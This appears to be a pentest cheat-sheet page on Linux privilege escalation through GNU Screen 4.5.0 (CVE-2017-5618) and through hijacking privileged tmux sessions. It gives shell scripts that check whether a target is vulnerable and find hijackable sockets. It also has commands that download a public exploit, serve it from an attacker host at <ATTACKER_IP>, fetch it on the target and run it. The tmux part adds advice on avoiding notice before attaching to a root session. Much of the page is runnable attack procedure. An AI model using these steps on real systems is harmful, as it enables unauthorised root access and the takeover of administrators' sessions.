PRIMARY CATEGORY → LINUX PRIVESC
GNU Screen
CVE-2017-5618
Affected Versions
Releases before 4.5.1 (4.5.1 contains the fix). The public exploit targets 4.5.0, which screen -v reports as 4.05.00. The bug only crosses a privilege boundary when the screen binary is installed setuid root, so check that before spending time on the setup below.
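Before transferring anything, it is worth confirming both conditions on the target. The following pre-flight script is an added example written for this page; it is not part of the original notes or of the linked exploit. It assumes GNU coreutils (stat -c) and the banner format that screen -v prints ("Screen version 4.05.00 (GNU) 10-Dec-16"); the helper names are my own.

```shell
#!/usr/bin/env bash
# Added pre-flight check (not from the original page or the linked exploit):
# confirm the target really has the vulnerable screen before dropping the script.
# Two conditions must hold for CVE-2017-5618 to give root:
#   1. the installed screen is 4.5.0 (`screen -v` prints 4.05.00); 4.5.1 has the fix
#   2. the screen binary is setuid root, otherwise the logfile is opened as us anyway

# Pull the dotted version out of a "screen -v" banner such as
# "Screen version 4.05.00 (GNU) 10-Dec-16".
screen_version_from_banner() {
    printf '%s\n' "$1" | sed -n 's/^Screen version \([0-9][0-9.]*\).*/\1/p'
}

# Normalise "4.05.00" / "4.5.0" / "4.5" to "4.5.0" so the comparison is not
# fooled by zero padding; a missing field counts as 0.
normalise_version() {
    printf '%s\n' "$1" | awk -F. '{ printf "%d.%d.%d\n", $1, $2, $3 }'
}

# Exit 0 if the version is the release the public exploit targets.
screen_version_vulnerable() {
    [ "$(normalise_version "$1")" = "4.5.0" ]
}

# Exit 0 if the given path is a setuid binary owned by root (uid 0).
is_setuid_root() {
    [ -u "$1" ] && [ "$(stat -c %u "$1" 2>/dev/null)" = "0" ]
}

# Run both checks against the screen found in PATH and report the verdict.
check_screen() {
    bin=$(command -v screen) || { echo "[-] screen not in PATH"; return 1; }
    ver=$(screen_version_from_banner "$(screen -v 2>&1)")
    if screen_version_vulnerable "$ver"; then
        echo "[+] $bin is version $ver (vulnerable release)"
    else
        echo "[-] $bin is version ${ver:-unknown}, not 4.5.0"
        return 1
    fi
    if is_setuid_root "$bin"; then
        echo "[+] $bin is setuid root, go ahead and transfer exploit.bash"
    else
        echo "[-] $bin is not setuid root; the logfile bug will not cross a privilege boundary"
        return 1
    fi
}
```

Drop the file in /dev/shm on the target, source it, and run check_screen; only when both lines show [+] is the download and transfer below worth doing.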
From the Target 🎯
screen -v
Setup
- Downloading the Script
From the Attacker ⚔️
curl --silent --location --request GET 'https://github.com/YasserREED/screen-v4.5.0-priv-escalate/raw/refs/heads/main/full-exploit.sh' --output exploit.bash
- Transferring the file to the Target
From the Attacker ⚔️
python -m http.server 80
From the Target 🎯
cd /dev/shm && curl --silent --location --request GET 'http://<ATTACKER_IP>/exploit.bash' --remote-name
Usage
bash exploit.bash
Tmux
More information about TMUX here
Hijacking TMUX Sessions
Once we start our enumeration to find a way to privesc, we reach the point where we list the running processes on the system
ps -faux
We take a look and see that there is a TMUX session running as root or another privileged user
This tells us that the sysadmins are in the habit of using TMUX on this server
If so, we can examine this further by running the following filter commands
pgrep --full --list-full -- 'tmux'
ps -faux | grep -i --color=always -- 'tmux'
Once we know that there is at least one active TMUX session on the server, we must look for the existing sockets related to the sessions
Bear in mind that any user with read and write privileges on a TMUX socket can create or attach to an existing TMUX server session via the socket, and every command typed in that session runs as the user who started the server
By default tmux keeps its socket at /tmp/tmux-<UID>/default (or under TMUX_TMPDIR) in a directory only the owner can enter, so the sockets worth hijacking are usually the ones an admin created in a shared location with -S; a server started that way shows the socket path on its command line in the ps output above
Therefore, we search for any TMUX socket that the current user has write permissions on
find / -path '*tmux*' -type s -writable 2> /dev/null
Then we can attach to the existing session, which is running as root or another privileged user, with the following command (a is the short form of attach-session)
tmux -S <SOCKET> a
Attaching is not silent: the window is resized to the smallest attached client and both clients see the same keystrokes and output, so whoever is already attached can notice the hijack
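The enumeration above can be scripted so that both sources of candidate sockets (the process list and the filesystem sweep) are checked in one go, together with a permission test that tells you whether -S will actually work before you attach. This is an added example written for this page, not code from the original notes; the function names are my own, and the ps lines used to exercise it are constructed, not captured from a real host.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): find tmux sockets that the
# current user could use to attach to someone else's server.
#
# 1. Parse the process list for servers or clients started with an explicit
#    socket (`tmux -S /path ...`); a sysadmin sharing a session usually did this.
# 2. Walk the filesystem for socket files with "tmux" in the path that are
#    writable by us (the page's find one-liner).
# 3. Test a candidate path the same way tmux -S would need it: a socket we can
#    read and write (the parent directory must also be searchable by us).

# Extract socket paths from ps-style text on stdin, e.g.
# "root 1234 tmux -S /opt/shared/tmux.sock new-session -d -s ops".
# Prints one unique path per line.
tmux_sockets_from_ps() {
    awk '/tmux/ { for (i = 1; i <= NF; i++) if ($i == "-S" && i < NF) print $(i + 1) }' \
        | sort -u
}

# Where tmux puts the default socket for a given uid: $TMUX_TMPDIR or /tmp,
# then tmux-<uid>/default. Root's default socket is /tmp/tmux-0/default.
default_tmux_socket_for_uid() {
    printf '%s/tmux-%s/default\n' "${TMUX_TMPDIR:-/tmp}" "$1"
}

# Filesystem sweep for sockets we can write to (the page's find command).
writable_tmux_sockets() {
    find / -path '*tmux*' -type s -writable 2>/dev/null
}

# Exit 0 if the path is a socket we can both read and write.
socket_is_usable() {
    [ -S "$1" ] && [ -r "$1" ] && [ -w "$1" ]
}

# Print every candidate with its owner and a verdict; run this on the target.
report() {
    echo "[*] sockets named on tmux command lines:"
    ps -eo user,pid,args | tmux_sockets_from_ps
    echo "[*] writable tmux sockets on disk:"
    writable_tmux_sockets
    echo "[*] root's default socket would be: $(default_tmux_socket_for_uid 0)"
    { ps -eo user,pid,args | tmux_sockets_from_ps; writable_tmux_sockets; } | sort -u \
    | while IFS= read -r sock; do
        if socket_is_usable "$sock"; then
            echo "[+] usable: $sock (owner $(stat -c %U "$sock" 2>/dev/null))"
            echo "    list sessions first: tmux -S '$sock' list-sessions"
        else
            echo "[-] not usable by us: $sock"
        fi
    done
}
```

Source the file on the target and call report. The list-sessions hint is deliberate: it talks to the server without taking over a terminal, so you learn the session names and which user owns the server before you attach and become visible to them.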